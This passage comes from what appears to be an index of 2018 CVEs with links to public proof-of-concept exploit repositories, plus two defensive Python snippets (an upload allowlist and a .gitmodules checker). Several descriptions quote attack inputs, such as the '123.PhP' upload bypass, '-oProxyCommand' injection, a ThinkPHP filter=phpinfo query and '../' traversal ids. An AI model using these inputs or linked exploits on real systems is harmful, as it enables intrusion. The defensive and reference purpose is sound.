Monstra CMS 3.0.4 allows remote attackers to execute arbitrary PHP code via a mixed-case file extension, as demonstrated by the 123.PhP filename, because plugins\box\filesmanager\filesmanager.admin.php mishandles the forbidden_types variable.

- [Jx0n0/monstra_cms-3.0.4--getshell](https://github.com/Jx0n0/monstra_cms-3.0.4--getshell)
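
The Monstra entry above is the classic failure of a case-sensitive extension blacklist. The following is an added example for this index (not Monstra code and not from the listed repository): a vulnerable blacklist check of the kind the description implies, next to an allowlist check that lowercases the extension, rejects multi-extension names and path separators. The forbidden/allowed sets and the filenames are constructed.

```python
"""Extension blacklist (bypassable) vs allowlist (hardened) for file uploads.

Added example, not Monstra CMS code. FORBIDDEN/ALLOWED and the sample names are
constructed for illustration.
"""
import os

# Constructed lists; a real deployment derives these from what the server executes.
FORBIDDEN = {"php", "phtml", "php3", "phar", "htaccess"}
ALLOWED = {"png", "jpg", "jpeg", "gif"}


def blacklist_allows(filename: str) -> bool:
    """Vulnerable pattern: compare the last extension, case-sensitively, against a
    deny list. '123.PhP' is not in FORBIDDEN, yet Apache/PHP handlers usually match
    extensions case-insensitively, so the file still executes."""
    ext = os.path.splitext(filename)[1].lstrip(".")
    return ext not in FORBIDDEN


def allowlist_allows(filename: str) -> bool:
    """Hardened pattern: reject anything that is not 'name.ext' with a lowercase
    extension from a short allow list; no directory components, no dotfiles,
    no double extensions such as 'a.php.jpg'."""
    base = os.path.basename(filename)
    if base != filename or base.startswith("."):
        return False            # path separators or a leading dot
    parts = base.split(".")
    if len(parts) != 2 or not parts[0]:
        return False            # zero or several extensions
    return parts[1].lower() in ALLOWED


def classify(filenames):
    """Return (blacklist_verdict, allowlist_verdict) per filename, for comparison."""
    return {f: (blacklist_allows(f), allowlist_allows(f)) for f in filenames}


if __name__ == "__main__":
    # Constructed sample names: the first is the mixed-case bypass from the advisory.
    for name, (bl, al) in classify(["123.PhP", "shell.php", "photo.JPG",
                                     "a.php.jpg", "../x.png"]).items():
        print(f"{name:12} blacklist={bl!s:5} allowlist={al}")
```

The allowlist function also enforces a single extension because the web server, not the application, decides how `a.php.jpg` is handled; the only robust rule is to store uploads under a server-generated name outside any executable directory.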

### CVE-2018-17431 (2019-01-29)

Web Console in Comodo UTM Firewall before 2.7.0 allows remote attackers to execute arbitrary code without authentication via a crafted URL.

- [Fadavvi/CVE-2018-17431-PoC](https://github.com/Fadavvi/CVE-2018-17431-PoC)
- [sanan2004/CVE-2018-17431-Comodo](https://github.com/sanan2004/CVE-2018-17431-Comodo)

### CVE-2018-17456 (2018-10-06)

Git before 2.14.5, 2.15.x before 2.15.3, 2.16.x before 2.16.5, 2.17.x before 2.17.2, 2.18.x before 2.18.1, and 2.19.x before 2.19.1 allows remote code execution during processing of a recursive "git clone" of a superproject if a .gitmodules file has a URL field beginning with a '-' character.

- [shpik-kr/CVE-2018-17456](https://github.com/shpik-kr/CVE-2018-17456)
- [matlink/CVE-2018-17456](https://github.com/matlink/CVE-2018-17456)
- [799600966/CVE-2018-17456](https://github.com/799600966/CVE-2018-17456)
- [AnonymKing/CVE-2018-17456](https://github.com/AnonymKing/CVE-2018-17456)
- [jiahuiLeee/test](https://github.com/jiahuiLeee/test)
- [KKkai0315/CVE-2018-17456](https://github.com/KKkai0315/CVE-2018-17456)
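
A pre-clone check for the condition CVE-2018-17456 describes (a `.gitmodules` `url` beginning with `-`), written as an added example for this index; it is not git's code and not taken from any of the repositories listed above. It parses the git-config syntax `.gitmodules` uses and flags submodules whose URL would be interpreted as an option. The sample file content is constructed.

```python
"""Flag .gitmodules entries whose url starts with '-' before a recursive clone.

Added example, not git code. The SAMPLE_GITMODULES text is constructed.
"""
import re
from typing import Dict, List

SECTION_RE = re.compile(r'^\s*\[submodule\s+"(?P<name>[^"]*)"\]\s*$')
KV_RE = re.compile(r'^\s*(?P<key>[A-Za-z][A-Za-z0-9-]*)\s*=\s*(?P<value>.*?)\s*$')


def parse_gitmodules(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal parser for the git-config syntax of .gitmodules:
    [submodule "name"] sections with indented key = value lines."""
    modules: Dict[str, Dict[str, str]] = {}
    current = None
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith(("#", ";")):
            continue
        m = SECTION_RE.match(line)
        if m:
            current = m.group("name")
            modules[current] = {}
            continue
        m = KV_RE.match(line)
        if m and current is not None:
            modules[current][m.group("key").lower()] = m.group("value")
    return modules


def suspicious_submodules(text: str) -> List[str]:
    """Names of submodules whose url begins with '-', the CVE-2018-17456 condition:
    such a value was handed to a child git process where it parsed as an option."""
    return [name for name, cfg in parse_gitmodules(text).items()
            if cfg.get("url", "").startswith("-")]


# Constructed sample: one ordinary submodule and one with an option-like url.
SAMPLE_GITMODULES = """\
[submodule "vendor/libfoo"]
\tpath = vendor/libfoo
\turl = https://example.invalid/libfoo.git
[submodule "evil"]
\tpath = evil
\turl = -evil-option
"""

if __name__ == "__main__":
    flagged = suspicious_submodules(SAMPLE_GITMODULES)
    print("suspicious submodules:", flagged or "none")
```

Run it over the superproject's `.gitmodules` before `git clone --recurse-submodules` on a client you cannot upgrade; `git config --file .gitmodules --get-regexp url` gives the same raw values if you prefer to eyeball them. Upgrading git to a fixed version remains the real remedy.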

### CVE-2018-17463 (2018-11-14)

Incorrect side effect annotation in V8 in Google Chrome prior to 70.0.3538.64 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.

- [kdmarti2/CVE-2018-17463](https://github.com/kdmarti2/CVE-2018-17463)
- [jhalon/CVE-2018-17463](https://github.com/jhalon/CVE-2018-17463)

### CVE-2018-17552 (2018-10-03)

SQL Injection in login.php in Naviwebs Navigate CMS 2.8 allows remote attackers to bypass authentication via the navigate-user cookie.

- [kimstars/CVE-2018-17552](https://github.com/kimstars/CVE-2018-17552)

### CVE-2018-17553 (2018-10-03)

An "Unrestricted Upload of File with Dangerous Type" issue with directory traversal in navigate_upload.php in Naviwebs Navigate CMS 2.8 allows authenticated attackers to achieve remote code execution via a POST request with engine=picnik and id=../../../navigate_info.php.

- [MidwintersTomb/CVE-2018-17553](https://github.com/MidwintersTomb/CVE-2018-17553)

### CVE-2018-17873 (2018-10-23)

An incorrect access control vulnerability in the FTP configuration of WiFiRanger devices with firmware version 7.0.8rc3 and earlier allows an attacker with adjacent network access to read the SSH Private Key and log in to the root account.

- [Luct0r/CVE-2018-17873](https://github.com/Luct0r/CVE-2018-17873)

### CVE-2018-17924 (2018-12-07)

Rockwell Automation MicroLogix 1400 Controllers and 1756 ControlLogix Communications Modules: an unauthenticated, remote threat actor could send a CIP connection request to an affected device and, upon successful connection, send a new IP configuration to the affected device even if the controller in the system is set to Hard RUN mode. When the affected device accepts this new IP configuration, a loss of communication occurs between the device and the rest of the system, as the system traffic is still attempting to communicate with the device via the overwritten IP address.

- [g0dd0ghd/CVE-2018-17924-PoC](https://github.com/g0dd0ghd/CVE-2018-17924-PoC)

### CVE-2018-17961 (2018-10-15)

Artifex Ghostscript 9.25 and earlier allows attackers to bypass a sandbox protection mechanism via vectors involving errorhandler setup. NOTE: this issue exists because of an incomplete fix for CVE-2018-17183.

- [matlink/CVE-2018-17961](https://github.com/matlink/CVE-2018-17961)

### CVE-2018-18026 (2018-10-19)

IMFCameraProtect.sys in IObit Malware Fighter 6.2 (and possibly lower versions) is vulnerable to a stack-based buffer overflow. The attacker can use DeviceIoControl to pass a user specified size which can be used to overwrite return addresses. This can lead to a denial of service or code execution attack.

- [DownWithUp/CVE-2018-18026](https://github.com/DownWithUp/CVE-2018-18026)

### CVE-2018-18333 (2019-02-05)

A DLL hijacking vulnerability in Trend Micro Security 2019 (Consumer) versions below 15.0.0.1163 could allow an attacker to manipulate a specific DLL and escalate privileges on vulnerable installations.

- [mrx04programmer/Dr.DLL-CVE-2018-18333](https://github.com/mrx04programmer/Dr.DLL-CVE-2018-18333)

### CVE-2018-18368 (2019-11-15)

Symantec Endpoint Protection Manager (SEPM), prior to 14.2 RU1, may be susceptible to a privilege escalation vulnerability, which is a type of issue whereby an attacker may attempt to compromise the software application to gain elevated access to resources that are normally protected from an application or user.

- [DimopoulosElias/SEPM-EoP](https://github.com/DimopoulosElias/SEPM-EoP)

### CVE-2018-18387 (2018-10-29)

playSMS through 1.4.2 allows Privilege Escalation through Daemon abuse.

- [TheeBlind/CVE-2018-18387](https://github.com/TheeBlind/CVE-2018-18387)

### CVE-2018-18500 (2019-02-05)

A use-after-free vulnerability can occur while parsing an HTML5 stream in concert with custom HTML elements. This results in the stream parser object being freed while still in use, leading to a potentially exploitable crash. This vulnerability affects Thunderbird < 60.5, Firefox ESR < 60.5, and Firefox < 65.

- [sophoslabs/CVE-2018-18500](https://github.com/sophoslabs/CVE-2018-18500)

### CVE-2018-18649 (2018-11-29)

An issue was discovered in the wiki API in GitLab Community and Enterprise Edition before 11.2.7, 11.3.x before 11.3.8, and 11.4.x before 11.4.3. It allows for remote code execution.

- [Snowming04/CVE-2018-18649](https://github.com/Snowming04/CVE-2018-18649)

### CVE-2018-18714 (2018-11-01)

RegFilter.sys in IOBit Malware Fighter 6.2 and earlier is susceptible to a stack-based buffer overflow when an attacker uses IOCTL 0x8006E010. This can lead to denial of service (DoS) or code execution with root privileges.

- [DownWithUp/CVE-2018-18714](https://github.com/DownWithUp/CVE-2018-18714)

### CVE-2018-18778 (2018-10-29)

ACME mini_httpd before 1.30 lets remote users read arbitrary files.

- [cyberharsh/Mini_httpd-CVE-2018-18778](https://github.com/cyberharsh/Mini_httpd-CVE-2018-18778)
- [auk0x01/CVE-2018-18778-Scanner](https://github.com/auk0x01/CVE-2018-18778-Scanner)

### CVE-2018-18852 (2019-06-18)

Cerio DT-300N 1.1.6 through 1.1.12 devices allow OS command injection because of improper input validation of the web-interface PING feature's use of Save.cgi to execute a ping command, as exploited in the wild in October 2018.

- [hook-s3c/CVE-2018-18852](https://github.com/hook-s3c/CVE-2018-18852)
- [andripwn/CVE-2018-18852](https://github.com/andripwn/CVE-2018-18852)

### CVE-2018-18893 (2019-01-03)

Jinjava before 2.4.6 does not block the getClass method, related to com/hubspot/jinjava/el/ext/JinjavaBeanELResolver.java.

- [LycsHub/CVE-2018-18893](https://github.com/LycsHub/CVE-2018-18893)

### CVE-2018-18925 (2018-11-04)

Gogs 0.11.66 allows remote code execution because it does not properly validate session IDs, as demonstrated by a ".." session-file forgery in the file session provider in file.go. This is related to session ID handling in the go-macaron/session code for Macaron.

- [j4k0m/CVE-2018-18925](https://github.com/j4k0m/CVE-2018-18925)

### CVE-2018-18955 (2018-11-16)

In the Linux kernel 4.15.x through 4.19.x before 4.19.2, map_write() in kernel/user_namespace.c allows privilege escalation because it mishandles nested user namespaces with more than 5 UID or GID ranges. A user who has CAP_SYS_ADMIN in an affected user namespace can bypass access controls on resources outside the namespace, as demonstrated by reading /etc/shadow. This occurs because an ID transformation takes place properly for the namespaced-to-kernel direction but not for the kernel-to-namespaced direction.

- [scheatkode/CVE-2018-18955](https://github.com/scheatkode/CVE-2018-18955)

### CVE-2018-19052 (2018-11-07)

An issue was discovered in mod_alias_physical_handler in mod_alias.c in lighttpd before 1.4.50. There is potential ../ path traversal of a single directory above an alias target, with a specific mod_alias configuration where the matched alias lacks a trailing '/' character, but the alias target filesystem path does have a trailing '/' character.

- [iveresk/cve-2018-19052](https://github.com/iveresk/cve-2018-19052)

### CVE-2018-19126 (2018-11-09)

PrestaShop 1.6.x before 1.6.1.23 and 1.7.x before 1.7.4.4 allows remote attackers to execute arbitrary code via a file upload.

- [farisv/PrestaShop-CVE-2018-19126](https://github.com/farisv/PrestaShop-CVE-2018-19126)

### CVE-2018-19127 (2018-11-09)

A code injection vulnerability in /type.php in PHPCMS 2008 allows attackers to write arbitrary content to a website cache file with a controllable filename, leading to arbitrary code execution. The PHP code is sent via the template parameter, and is written to a data/cache_template/*.tpl.php file along with a "<?php function " substring.

- [ab1gale/phpcms-2008-CVE-2018-19127](https://github.com/ab1gale/phpcms-2008-CVE-2018-19127)

### CVE-2018-19131 (2018-11-09)

Squid before 4.4 has XSS via a crafted X.509 certificate during HTTP(S) error page generation for certificate errors.

- [JonathanWilbur/CVE-2018-19131](https://github.com/JonathanWilbur/CVE-2018-19131)

### CVE-2018-19207 (2018-11-12)

The Van Ons WP GDPR Compliance (aka wp-gdpr-compliance) plugin before 1.4.3 for WordPress allows remote attackers to execute arbitrary code because $wpdb->prepare() input is mishandled, as exploited in the wild in November 2018.

- [aeroot/WP-GDPR-Compliance-Plugin-Exploit](https://github.com/aeroot/WP-GDPR-Compliance-Plugin-Exploit)
- [cved-sources/cve-2018-19207](https://github.com/cved-sources/cve-2018-19207)

### CVE-2018-19246 (2018-11-13)

PHP-Proxy 5.1.0 allows remote attackers to read local files if the default "pre-installed version" (intended for users who lack shell access to their web server) is used. This occurs because the aeb067ca0aa9a3193dce3a7264c90187 app_key value from the default config.php is in place, and this value can be easily used to calculate the authorization data needed for local file inclusion.

- [NeoWans/CVE-2018-19246](https://github.com/NeoWans/CVE-2018-19246)

### CVE-2018-19276 (2019-03-17)

OpenMRS before 2.24.0 is affected by an Insecure Object Deserialization vulnerability that allows an unauthenticated user to execute arbitrary commands on the targeted system via crafted XML data in a request body.

- [mpgn/CVE-2018-19276](https://github.com/mpgn/CVE-2018-19276)

### CVE-2018-19320 (2018-12-21)

The GDrv low-level driver in GIGABYTE APP Center v1.05.21 and earlier, AORUS GRAPHICS ENGINE before 1.57, XTREME GAMING ENGINE before 1.26, and OC GURU II v2.08 exposes ring0 memcpy-like functionality that could allow a local attacker to take complete control of the affected system.

- [ASkyeye/CVE-2018-19320](https://github.com/ASkyeye/CVE-2018-19320)
- [hmnthabit/CVE-2018-19320-LPE](https://github.com/hmnthabit/CVE-2018-19320-LPE)
- [zer0condition/GDRVLoader](https://github.com/zer0condition/GDRVLoader)

### CVE-2018-19321 (2018-12-21)

The GPCIDrv and GDrv low-level drivers in GIGABYTE APP Center v1.05.21 and earlier, AORUS GRAPHICS ENGINE before 1.57, XTREME GAMING ENGINE before 1.26, and OC GURU II v2.08 expose functionality to read and write arbitrary physical memory. This could be leveraged by a local attacker to elevate privileges.

- [nanabingies/Driver-RW](https://github.com/nanabingies/Driver-RW)
- [nanabingies/CVE-2018-19321](https://github.com/nanabingies/CVE-2018-19321)

### CVE-2018-19410 (2018-11-21)

PRTG Network Monitor before 18.2.40.1683 allows remote unauthenticated attackers to create users with read-write privileges (including administrator). A remote unauthenticated user can craft an HTTP request and override attributes of the 'include' directive in /public/login.htm and perform a Local File Inclusion attack, by including /api/addusers and executing it. By providing the 'id' and 'users' parameters, an unauthenticated attacker can create a user with read-write privileges (including administrator).

- [himash/CVE-2018-19410-POC](https://github.com/himash/CVE-2018-19410-POC)

### CVE-2018-19422 (2018-11-21)

/panel/uploads in Subrion CMS 4.2.1 allows remote attackers to execute arbitrary PHP code via a .pht or .phar file, because the .htaccess file omits these.

- [hev0x/CVE-2018-19422-SubrionCMS-RCE](https://github.com/hev0x/CVE-2018-19422-SubrionCMS-RCE)
- [Swammers8/SubrionCMS-4.2.1-File-upload-RCE-auth-](https://github.com/Swammers8/SubrionCMS-4.2.1-File-upload-RCE-auth-)

### CVE-2018-19466 (2019-03-27)

A vulnerability was found in Portainer before 1.20.0. Portainer stores LDAP credentials, corresponding to a master password, in cleartext and allows their retrieval via API calls.

- [MauroEldritch/lempo](https://github.com/MauroEldritch/lempo)

### CVE-2018-19487 (2019-03-17)

The WP-jobhunt plugin before version 2.4 for WordPress does not control AJAX requests sent to the cs_employer_ajax_profile() function through the admin-ajax.php file, which allows remote unauthenticated attackers to enumerate information about users.

- [YOLOP0wn/wp-jobhunt-exploit](https://github.com/YOLOP0wn/wp-jobhunt-exploit)

### CVE-2018-19518 (2018-11-25)

University of Washington IMAP Toolkit 2007f on UNIX, as used in imap_open() in PHP and other products, launches an rsh command (by means of the imap_rimap function in c-client/imap4r1.c and the tcp_aopen function in osdep/unix/tcp_unix.c) without preventing argument injection, which might allow remote attackers to execute arbitrary OS commands if the IMAP server name is untrusted input (e.g., entered by a user of a web application) and if rsh has been replaced by a program with different argument semantics. For example, if rsh is a link to ssh (as seen on Debian and Ubuntu systems), then the attack can use an IMAP server name containing a "-oProxyCommand" argument.

- [ensimag-security/CVE-2018-19518](https://github.com/ensimag-security/CVE-2018-19518)
- [houqe/EXP_CVE-2018-19518](https://github.com/houqe/EXP_CVE-2018-19518)

### CVE-2018-19537 (2018-11-26)

TP-Link Archer C5 devices through V2_160201_US allow remote command execution via shell metacharacters on the wan_dyn_hostname line of a configuration file that is encrypted with the 478DA50BF9E3D2CF key and uploaded through the web GUI by using the web admin account. The default password of admin may be used in some cases.

- [JackDoan/TP-Link-ArcherC5-RCE](https://github.com/JackDoan/TP-Link-ArcherC5-RCE)

### CVE-2018-19571 (2019-07-10)

GitLab CE/EE, versions 8.18 up to 11.x before 11.3.11, 11.4 before 11.4.8, and 11.5 before 11.5.1, are vulnerable to an SSRF vulnerability in webhooks.

- [xenophil90/edb-49263-fixed](https://github.com/xenophil90/edb-49263-fixed)
- [Algafix/gitlab-RCE-11.4.7](https://github.com/Algafix/gitlab-RCE-11.4.7)
- [CS4239-U6/gitlab-ssrf](https://github.com/CS4239-U6/gitlab-ssrf)

### CVE-2018-19592 (2019-09-27)

The "CLink4Service" service is installed with Corsair Link 4.9.7.35 with insecure permissions by default. This allows unprivileged users to take control of the service and execute commands in the context of NT AUTHORITY\SYSTEM, leading to total system takeover, a similar issue to CVE-2018-12441.

- [BradyDonovan/CVE-2018-19592](https://github.com/BradyDonovan/CVE-2018-19592)

### CVE-2018-19788 (2018-12-03)

A flaw was found in PolicyKit (aka polkit) 0.115 that allows a user with a uid greater than INT_MAX to successfully execute any systemctl command.

- [AbsoZed/CVE-2018-19788](https://github.com/AbsoZed/CVE-2018-19788)
- [d4gh0s7/CVE-2018-19788](https://github.com/d4gh0s7/CVE-2018-19788)
- [Ekultek/PoC](https://github.com/Ekultek/PoC)
- [jhlongjr/CVE-2018-19788](https://github.com/jhlongjr/CVE-2018-19788)

### CVE-2018-19859 (2018-12-05)

OpenRefine before 3.2 beta allows directory traversal via a relative pathname in a ZIP archive.

- [WhiteOakSecurity/CVE-2018-19859](https://github.com/WhiteOakSecurity/CVE-2018-19859)

### CVE-2018-19911 (2018-12-06)

FreeSWITCH through 1.8.2, when mod_xml_rpc is enabled, allows remote attackers to execute arbitrary commands via the api/system or txtapi/system (or api/bg_system or txtapi/bg_system) query string on TCP port 8080, as demonstrated by an api/system?calc URI. This can also be exploited via CSRF. Alternatively, the default password "works" for the freeswitch account can sometimes be used.

- [iSafeBlue/freeswitch_rce](https://github.com/iSafeBlue/freeswitch_rce)

### CVE-2018-19987 (2019-05-13)

D-Link DIR-822 Rev.B 202KRb06, DIR-822 Rev.C 3.10B06, DIR-860L Rev.B 2.03.B03, DIR-868L Rev.B 2.05B02, DIR-880L Rev.A 1.20B01_01_i3se_BETA, and DIR-890L Rev.A 1.21B02_BETA devices mishandle IsAccessPoint in /HNAP1/SetAccessPointMode. In the SetAccessPointMode.php source code, the IsAccessPoint parameter is saved in the ShellPath script file without any regex checking. After the script file is executed, the command injection occurs. A vulnerable /HNAP1/SetAccessPointMode XML message could have shell metacharacters in the IsAccessPoint element such as the `telnetd` string.

- [nahueldsanchez/blogpost_cve-2018-19987-analysis](https://github.com/nahueldsanchez/blogpost_cve-2018-19987-analysis)

### CVE-2018-20062 (2018-12-11)

An issue was discovered in NoneCms V1.3. thinkphp/library/think/App.php allows remote attackers to execute arbitrary PHP code via crafted use of the filter parameter, as demonstrated by the s=index/\think\Request/input&filter=phpinfo&data=1 query string.

- [NS-Sp4ce/thinkphp5.XRce](https://github.com/NS-Sp4ce/thinkphp5.XRce)
- [yilin1203/CVE-2018-20062](https://github.com/yilin1203/CVE-2018-20062)

### CVE-2018-20148 (2018-12-14)

In WordPress before 4.9.9 and 5.x before 5.0.1, contributors could conduct PHP object injection attacks via crafted metadata in a wp.getMediaItem XMLRPC call. This is caused by mishandling of serialized data at phar:// URLs in the wp_get_attachment_thumb_file function in wp-includes/post.php.

- [nth347/CVE-2018-20148_exploit](https://github.com/nth347/CVE-2018-20148_exploit)

### CVE-2018-20162 (2019-03-17)

Digi TransPort LR54 4.4.0.26 and possible earlier devices have Improper Input Validation that allows users with 'super' CLI access privileges to bypass a restricted shell and execute arbitrary commands as root.

- [stigtsp/CVE-2018-20162-digi-lr54-restricted-shell-escape](https://github.com/stigtsp/CVE-2018-20162-digi-lr54-restricted-shell-escape)

### CVE-2018-20165 (2019-03-22)

Cross-site scripting (XSS) vulnerability in OpenText Portal 7.4.4 allows remote attackers to inject arbitrary web script or HTML via the vgnextoid parameter to a menuitem URI.

- [hect0rS/Reflected-XSS-on-Opentext-Portal-v7.4.4](https://github.com/hect0rS/Reflected-XSS-on-Opentext-Portal-v7.4.4)

### CVE-2018-20250 (2019-02-05)

In WinRAR versions prior to and including 5.61, there is a path traversal vulnerability when crafting the filename field of the ACE format (in UNACEV2.dll). When the filename field is manipulated with specific patterns, the destination (extraction) folder is ignored, and the filename is treated as an absolute path.

- [WyAtu/CVE-2018-20250](https://github.com/WyAtu/CVE-2018-20250)
- [QAX-A-Team/CVE-2018-20250](https://github.com/QAX-A-Team/CVE-2018-20250)
- [nmweizi/CVE-2018-20250-poc-winrar](https://github.com/nmweizi/CVE-2018-20250-poc-winrar)
- [blunden/UNACEV2.DLL-CVE-2018-20250](https://github.com/blunden/UNACEV2.DLL-CVE-2018-20250)
- [easis/CVE-2018-20250-WinRAR-ACE](https://github.com/easis/CVE-2018-20250-WinRAR-ACE)
- [STP5940/CVE-2018-20250](https://github.com/STP5940/CVE-2018-20250)
- [technicaldada/hack-winrar](https://github.com/technicaldada/hack-winrar)
- [Ektoplasma/ezwinrar](https://github.com/Ektoplasma/ezwinrar)
- [arkangel-dev/CVE-2018-20250-WINRAR-ACE-GUI](https://github.com/arkangel-dev/CVE-2018-20250-WINRAR-ACE-GUI)
- [AeolusTF/CVE-2018-20250](https://github.com/AeolusTF/CVE-2018-20250)
- [joydragon/Detect-CVE-2018-20250](https://github.com/joydragon/Detect-CVE-2018-20250)
- [likekabin/CVE-2018-20250](https://github.com/likekabin/CVE-2018-20250)
- [H4xl0r/WinRar_ACE_exploit_CVE-2018-20250](https://github.com/H4xl0r/WinRar_ACE_exploit_CVE-2018-20250)
- [eastmountyxz/CVE-2018-20250-WinRAR](https://github.com/eastmountyxz/CVE-2018-20250-WinRAR)
- [lxg5763/cve-2018-20250](https://github.com/lxg5763/cve-2018-20250)
- [zeronohacker/CVE-2018-20250](https://github.com/zeronohacker/CVE-2018-20250)
- [tzwlhack/CVE-2018-20250](https://github.com/tzwlhack/CVE-2018-20250)
- [tannlh/CVE-2018-20250](https://github.com/tannlh/CVE-2018-20250)
- [LamSonBinh/CVE-2018-20250](https://github.com/LamSonBinh/CVE-2018-20250)

### CVE-2018-20343 (2020-03-02)

Multiple buffer overflow vulnerabilities have been found in Ken Silverman Build Engine 1. An attacker could craft a special map file to execute arbitrary code when the map file is loaded.

- [Alexandre-Bartel/CVE-2018-20343](https://github.com/Alexandre-Bartel/CVE-2018-20343)

### CVE-2018-20377 (2018-12-23)

Orange Livebox 00.96.320S devices allow remote attackers to discover Wi-Fi credentials via /get_getnetworkconf.cgi on port 8080, leading to full control if the admin password equals the Wi-Fi password or has the default admin value. This is related to Firmware 01.11.2017-11:43:44, Boot v0.70.03, Modem 5.4.1.10.1.1A, Hardware 02, and Arcadyan ARV7519RW22-A-L T VR9 1.2.

- [zadewg/LIVEBOX-0DAY](https://github.com/zadewg/LIVEBOX-0DAY)

### CVE-2018-20433 (2018-12-24)

c3p0 0.9.5.2 allows XXE in extractXmlConfigFromInputStream in com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java during initialization.

- [shanika04/cp30_XXE_partial_fix](https://github.com/shanika04/cp30_XXE_partial_fix)

### CVE-2018-20434 (2019-04-24)

LibreNMS 1.46 allows remote attackers to execute arbitrary OS commands by using the $_POST['community'] parameter to html/pages/addhost.inc.php during creation of a new device, and then making a /ajax_output.php?id=capture&format=text&type=snmpwalk&hostname=localhost request that triggers html/includes/output/capture.inc.php command mishandling.

- [mhaskar/CVE-2018-20434](https://github.com/mhaskar/CVE-2018-20434)

### CVE-2018-20463 (2018-12-25)

An issue was discovered in the JSmol2WP plugin 1.07 for WordPress. There is an arbitrary file read vulnerability via ../ directory traversal in query=php://filter/resource= in the jsmol.php query string. This can also be used for SSRF.

- [Henry4E36/CVE-2018-20463](https://github.com/Henry4E36/CVE-2018-20463)

### CVE-2018-20555 (2019-03-18)

The Design Chemical Social Network Tabs plugin 1.7.1 for WordPress allows remote attackers to discover Twitter access_token, access_token_secret, consumer_key, and consumer_secret values by reading the dcwp_twitter.php source code. This leads to Twitter account takeover.

- [fs0c131y/CVE-2018-20555](https://github.com/fs0c131y/CVE-2018-20555)

### CVE-2018-20580 (2019-05-03)

The WSDL import functionality in SmartBear ReadyAPI 2.5.0 and 2.6.0 allows remote attackers to execute arbitrary Java code via a crafted request parameter in a WSDL file.

- [gscamelo/CVE-2018-20580](https://github.com/gscamelo/CVE-2018-20580)

### CVE-2018-20718 (2019-01-15)

In Pydio before 8.2.2, an attack is possible via PHP Object Injection because a user is allowed to use the $phpserial$a:0:{} syntax to store a preference. An attacker either needs a "public link" of a file, or access to any unprivileged user account for creation of such a link.

- [us3r777/CVE-2018-20718](https://github.com/us3r777/CVE-2018-20718)

### CVE-2018-20966 (2019-08-12)

The woocommerce-jetpack plugin before 3.8.0 for WordPress has XSS in the Products Per Page feature.

- [parzel/CVE-2018-20966](https://github.com/parzel/CVE-2018-20966)

### CVE-2018-25031 (2022-03-11)

Swagger UI 4.1.2 and earlier could allow a remote attacker to conduct spoofing attacks. By persuading a victim to open a crafted URL, an attacker could exploit this vulnerability to display remote OpenAPI definitions. Note: This was originally claimed to be resolved in 4.1.3. However, third parties have indicated this is not resolved in 4.1.3 and even occurs in that version and possibly others.

- [afine-com/CVE-2018-25031](https://github.com/afine-com/CVE-2018-25031)
- [kriso4os/CVE-2018-25031](https://github.com/kriso4os/CVE-2018-25031)
- [rafaelcintralopes/SwaggerUI-CVE-2018-25031](https://github.com/rafaelcintralopes/SwaggerUI-CVE-2018-25031)
- [mathis2001/CVE-2018-25031](https://github.com/mathis2001/CVE-2018-25031)
- [wrkk112/CVE-2018-25031](https://github.com/wrkk112/CVE-2018-25031)
- [LUCASRENAA/CVE-2018-25031](https://github.com/LUCASRENAA/CVE-2018-25031)
- [hev0x/CVE-2018-25031-PoC](https://github.com/hev0x/CVE-2018-25031-PoC)
- [johnlaurance/CVE-2018-25031-test2](https://github.com/johnlaurance/CVE-2018-25031-test2)
- [geozin/POC-CVE-2018-25031](https://github.com/geozin/POC-CVE-2018-25031)
- [h2oa/CVE-2018-25031](https://github.com/h2oa/CVE-2018-25031)
- [natpakun/SSRF-CVE-2018-25031-](https://github.com/natpakun/SSRF-CVE-2018-25031-)

### CVE-2018-25032 (2022-03-25)

zlib before 1.2.12 allows memory corruption when deflating (i.e., when compressing) if the input has many distant matches.

- [Trinadh465/external_zlib_4.4_CVE-2018-25032](https://github.com/Trinadh465/external_zlib_4.4_CVE-2018-25032)
- [Satheesh575555/external_zlib-1.2.7_CVE-2018-25032](https://github.com/Satheesh575555/external_zlib-1.2.7_CVE-2018-25032)
- [Trinadh465/external_zlib_AOSP10_r33_CVE-2018-25032](https://github.com/Trinadh465/external_zlib_AOSP10_r33_CVE-2018-25032)

### CVE-2018-25075 (2023-01-15)

A critical vulnerability was found in karsany OBridge up to 1.3. Affected by this issue is the function getAllStandaloneProcedureAndFunction of the file obridge-main/src/main/java/org/obridge/dao/ProcedureDao.java. Manipulation with unknown data can lead to exploitation of a SQL injection vulnerability. The complexity of an attack is rather high, and it is considered difficult to exploit. Upgrading to version 1.4 addresses this issue. The patch is identified as 52eca4ad05f3c292aed3178b2f58977686ffa376. Applying the upgrade is recommended as the best possible mitigation.

- [epicosy/obridge](https://github.com/epicosy/obridge)

### CVE-2018-1000001 (2018-01-31)

In glibc 2.26 and earlier there is confusion in the usage of getcwd() by realpath() which can be used to write before the destination buffer leading to a buffer underflow and potential code execution.

- [0x00-0x00/CVE-2018-1000001](https://github.com/0x00-0x00/CVE-2018-1000001)
- [usernameid0/tools-for-CVE-2018-1000001](https://github.com/usernameid0/tools-for-CVE-2018-1000001)

### CVE-2018-1000006 (2018-01-24)

GitHub Electron versions 1.8.2-beta.3 and earlier, 1.7.10 and earlier, and 1.6.15 and earlier have a vulnerability in the protocol handler: specifically, Electron apps running on Windows 10, 7 or 2008 that register custom protocol handlers can be tricked into arbitrary command execution if the user clicks on a specially crafted URL. This has been fixed in versions 1.8.2-beta.4, 1.7.11, and 1.6.16.

- [CHYbeta/CVE-2018-1000006-DEMO](https://github.com/CHYbeta/CVE-2018-1000006-DEMO)

### CVE-2018-1000030 (2018-02-08)

Python 2.7.14 is vulnerable to a Heap-Buffer-Overflow as well as a Heap-Use-After-Free. Python versions prior to 2.7.14 may also be vulnerable, and it appears that Python 2.7.17 and prior may also be vulnerable; however, this has not been confirmed. The vulnerability lies in the handling of large amounts of data by multiple threads. In both cases there is essentially a race condition that occurs. For the Heap-Buffer-Overflow, Thread 2 is creating the size for a buffer, but Thread 1 is already writing to the buffer without knowing how much to write. So when a large amount of data is being processed, it is very easy to cause memory corruption using a Heap-Buffer-Overflow. As for the Use-After-Free: Thread 3 mallocs, Thread 1 frees, and Thread 2 re-uses the freed memory. The PSRT has stated that this is not a security vulnerability due to the fact that the attacker must be able to run code; however, in some situations, such as function as a service, this vulnerability can potentially be used by an attacker to violate a trust boundary, and as such the DWF feels this issue deserves a 